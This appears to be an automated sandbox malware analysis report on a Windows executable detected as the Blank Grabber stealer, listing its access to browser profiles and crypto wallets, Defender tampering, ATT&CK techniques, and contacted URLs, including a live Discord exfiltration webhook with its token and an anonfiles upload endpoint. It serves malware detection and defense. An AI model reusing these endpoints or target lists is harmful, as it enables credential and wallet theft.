              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1720264732.000001F32EEE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1982629773.000002290B711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1720264732.000001F32EEE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73802\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002B5D bind,WSAGetLastError,1_2_00007FFDFB002B5D

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		4
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager47
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login HookLogin Hook11
              Software Packing              		NTDS161
              Security Software Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
              Virtualization/Sandbox Evasion              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1477272 Sample: e45AiBoV6X.exe Startdate: 20/07/2024 Architecture: WINDOWS Score: 100 67 ip-api.com 2->67 69 canary.discord.com 2->69 83 Sigma detected: Capture Wi-Fi password 2->83 85 Multi AV Scanner detection for submitted file 2->85 87 Yara detected Blank Grabber 2->87 89 9 other signatures 2->89 11 e45AiBoV6X.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 105 Very long command line found 11->105 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 3 other signatures 11->111 15 e45AiBoV6X.exe 1 70 11->15         started        signatures6 process7 dnsIp8 71 ip-api.com 208.95.112.1, 49742, 80 TUT-ASUS United States 15->71 73 canary.discord.com 162.159.137.232, 443, 49743 CLOUDFLARENETUS United States 15->73 75 Very long command line found 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 6 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 23 other processes 15->26 signatures9 process10 signatures11 91 Suspicious powershell command line found 19->91 93 Very long command line found 19->93 95 Encrypted powershell cmdline option found 19->95 103 3 other signatures 19->103 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        97 Modifies Windows Defender protection settings 22->97 99 Removes signatures from Windows Defender 22->99 33 powershell.exe 23 22->33         started        41 2 other processes 22->41 43 2 other processes 24->43 101 Tries to harvest and steal WLAN passwords 26->101 35 WMIC.exe 26->35         started        37 getmac.exe 26->37         started        39 systeminfo.exe 26->39         started        46 43 other processes 26->46 process12 file13 113 Loading BitLocker PowerShell Module 28->113 115 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 35->115 117 Writes or reads registry keys via WMI 35->117 63 C:\Users\user\AppData\...\bohkan2x.cmdline, Unicode 43->63 dropped 48 csc.exe 43->48         started        65 C:\Users\user\AppData\Local\Temp\ZEPXL.zip, RAR 46->65 dropped signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\bohkan2x.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              e45AiBoV6X.exe50%VirustotalBrowse
              e45AiBoV6X.exe47%ReversingLabsWin64.Trojan.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\libffi-7.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\python310.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              ip-api.com0%VirustotalBrowse
              canary.discord.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://www.avito.ru/0%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              https://www.leboncoin.fr/0%URL Reputationsafe
              https://weibo.com/0%URL Reputationsafe
              https://www.msn.com0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.amazon.ca/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://www.amazon.com/0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://MD8.mozilla.org/1/m0%URL Reputationsafe
              https://bugzilla.mo0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://www.python.org/download/releases/2.3/mro/.0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
              https://account.bellmedia.c0%URL Reputationsafe
              https://login.microsoftonline.com0%URL Reputationsafe
              http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://github.com/Blank-c/Blank-Grabberi2%VirustotalBrowse
              https://api.telegram.org/bot%s/%s0%VirustotalBrowse
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://ocsp.thawte.com00%URL Reputationsafe
              https://www.wykop.pl/0%URL Reputationsafe
              https://twitter.com/0%URL Reputationsafe
              https://www.olx.pl/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://api.telegram.org/bot%s/%s0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://github.com/Blank-c/Blank-Grabberi0%Avira URL Cloudsafe
              https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/292070%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              https://media.discordapp.net/attachments/1248781326262468744/1264315028736180234/Blank-user.rar?ex=0%Avira URL Cloudsafe
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
              https://python.org/dev/peps/pep-0263/0%Avira URL Cloudsafe
              https://tools.ietf.org/html/rfc2388#section-4.40%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/292070%VirustotalBrowse
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
              https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef218700%Avira URL Cloudsafe
              https://tools.ietf.org/html/rfc2388#section-4.40%VirustotalBrowse
              https://discord.com/api/v9/users/0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload1%VirustotalBrowse
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
              https://python.org/dev/peps/pep-0263/0%VirustotalBrowse
              https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef218700%VirustotalBrowse
              https://github.com/Blank-c/BlankOBF2%VirustotalBrowse
              http://json.org0%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%VirustotalBrowse
              https://discord.com/api/v9/users/0%VirustotalBrowse
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://json.org0%VirustotalBrowse
              https://httpbin.org/0%Avira URL Cloudsafe
              https://canary.discord.com/api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFV0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%VirustotalBrowse
              https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%VirustotalBrowse
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%VirustotalBrowse
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
              https://cdn.discordapp.com/attachments/1248781326262468744/1264315028736180234/Blank-user.rar?ex=660%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%VirustotalBrowse
              http://ip-api.com/line/?fields=hostingr0%Avira URL Cloudsafe
              https://httpbin.org/1%VirustotalBrowse
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%VirustotalBrowse
              https://api.telegram.org/bot%s/%s)0%Avira URL Cloudsafe
              http://tools.ietf.org/html/rfc6125#section-6.4.30%Avira URL Cloudsafe
              https://google.com/mail0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
              http://tools.ietf.org/html/rfc6125#section-6.4.30%VirustotalBrowse
              https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g0%VirustotalBrowse
              https://www.google.com/0%Avira URL Cloudsafe
              https://foss.heptapod.net/pypy/pypy/-/issues/35390%Avira URL Cloudsafe
              https://google.com/mail0%VirustotalBrowse
              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%VirustotalBrowse
              http://google.com/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalseunknown
              ip-api.com
              		208.95.112.1
              		truefalseunknown
              canary.discord.com
              		162.159.137.232
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://canary.discord.com/api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVMnWhurxQmS0fvG_72iP5niS7D08Vfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabe45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://github.com/Blank-c/BlankOBFe45AiBoV6X.exe, 00000001.00000003.1737388193.000002290B2D2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737288766.000002290ADD1000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737768568.000002290ADCC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737839333.000002290ADD1000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.org/bot%s/%se45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.avito.ru/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/ac/?q=e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0e45AiBoV6X.exe, 00000000.00000002.1998861358.000001F32EEC8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/Blank-c/Blank-Grabberie45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/urllib3/urllib3/issues/29207e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://media.discordapp.net/attachments/1248781326262468744/1264315028736180234/Blank-user.rar?ex=e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://python.org/dev/peps/pep-0263/e45AiBoV6X.exe, 00000001.00000002.1992435238.00007FFDFB77F000.00000040.00000001.01000000.00000004.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#e45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.leboncoin.fr/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B678000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://tools.ietf.org/html/rfc2388#section-4.4e45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://weibo.com/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://api.anonfiles.com/uploade45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
